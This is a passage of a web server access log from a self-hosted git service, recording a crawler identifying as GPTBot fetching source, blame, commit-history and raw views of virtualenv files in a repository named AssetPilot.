74.7.227.38] [Length 9935] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python" -[17/Feb/2026:15:28:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 10182] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:15:28:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/uvicorn" [Client 74.7.227.38] [Length 10413] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/uvicorn" -[17/Feb/2026:15:28:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/uvicorn" [Client 74.7.227.38] [Length 9935] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/uvicorn" -[17/Feb/2026:15:28:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python3?display=source" [Client 74.7.227.38] [Length 11096] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python3" -[17/Feb/2026:15:28:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/uvicorn" [Client 74.7.227.38] [Length 10414] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/uvicorn" -[17/Feb/2026:15:28:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python3" [Client 74.7.227.38] [Length 9998] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python3" -[17/Feb/2026:15:28:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/uvicorn" [Client 74.7.227.38] [Length 9936] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/uvicorn" -[17/Feb/2026:15:28:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python3" [Client 74.7.227.38] [Length 9964] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python3" -[17/Feb/2026:15:28:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python" [Client 74.7.227.38] [Length 9979] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python" -[17/Feb/2026:15:28:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 43] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:15:28:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 74.7.227.38] [Length 22427] [Gzip 11.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/Activate.ps1" -[17/Feb/2026:15:28:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/uvicorn" [Client 74.7.227.38] [Length 255] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/uvicorn" -[17/Feb/2026:15:28:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/uvicorn" [Client 74.7.227.38] [Length 255] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/uvicorn" -[17/Feb/2026:15:28:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python3.12" [Client 74.7.227.38] [Length 7] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python3.12" -[17/Feb/2026:15:28:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 74.7.227.38] [Length 9033] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/Activate.ps1" -[17/Feb/2026:15:28:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python3" [Client 74.7.227.38] [Length 11065] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin" -[17/Feb/2026:15:28:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip" [Client 74.7.227.38] [Length 10420] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip" -[17/Feb/2026:15:28:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate.fish" [Client 74.7.227.38] [Length 13514] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin" -[17/Feb/2026:15:28:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip" [Client 74.7.227.38] [Length 11540] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin" -[17/Feb/2026:15:28:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip3" [Client 74.7.227.38] [Length 11564] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin" -[17/Feb/2026:15:28:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate.csh" [Client 74.7.227.38] [Length 12155] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin" -[17/Feb/2026:15:28:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/httpx" [Client 74.7.227.38] [Length 11485] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin" -[17/Feb/2026:15:28:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip3" [Client 74.7.227.38] [Length 11550] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin" -[17/Feb/2026:15:28:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/dotenv" [Client 74.7.227.38] [Length 11536] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin" -[17/Feb/2026:15:28:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate.fish" [Client 74.7.227.38] [Length 13517] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin" -[17/Feb/2026:15:28:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 74.7.227.38] [Length 19892] [Gzip 5.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin" -[17/Feb/2026:15:28:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python3" [Client 74.7.227.38] [Length 9991] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python3" -[17/Feb/2026:15:28:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python3" [Client 74.7.227.38] [Length 9944] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python3" -[17/Feb/2026:15:28:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate.fish" [Client 74.7.227.38] [Length 9948] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate.fish" -[17/Feb/2026:15:29:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate.fish" [Client 74.7.227.38] [Length 13251] [Gzip 6.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate.fish" -[17/Feb/2026:15:29:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip3" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip3" -[17/Feb/2026:15:29:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip3" [Client 74.7.227.38] [Length 9961] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip3" -[17/Feb/2026:15:29:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/httpx" [Client 74.7.227.38] [Length 9893] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/httpx" -[17/Feb/2026:15:29:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip3" [Client 74.7.227.38] [Length 9941] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip3" -[17/Feb/2026:15:29:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/dotenv" [Client 74.7.227.38] [Length 10412] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/dotenv" -[17/Feb/2026:15:29:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/dotenv" [Client 74.7.227.38] [Length 9936] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/dotenv" -[17/Feb/2026:15:29:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate.fish" [Client 74.7.227.38] [Length 9947] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate.fish" -[17/Feb/2026:15:29:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate.csh" [Client 74.7.227.38] [Length 11434] [Gzip 4.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate.csh" -[17/Feb/2026:15:29:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate.fish" [Client 74.7.227.38] [Length 13250] [Gzip 6.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate.fish" -[17/Feb/2026:15:29:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip" -[17/Feb/2026:15:29:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate.csh" [Client 74.7.227.38] [Length 946] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate.csh" -[17/Feb/2026:15:29:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip" [Client 74.7.227.38] [Length 10418] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip" -[17/Feb/2026:15:29:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 74.7.227.38] [Length 22437] [Gzip 11.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/Activate.ps1" -[17/Feb/2026:15:29:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/dotenv" [Client 74.7.227.38] [Length 256] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/dotenv" -[17/Feb/2026:15:29:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip3" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip3" -[17/Feb/2026:15:29:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/httpx" [Client 74.7.227.38] [Length 10375] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/httpx" -[17/Feb/2026:15:29:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate.fish" [Client 74.7.227.38] [Length 2221] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate.fish" -[17/Feb/2026:15:29:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 74.7.227.38] [Length 9033] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/Activate.ps1" -[17/Feb/2026:15:29:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate.csh" [Client 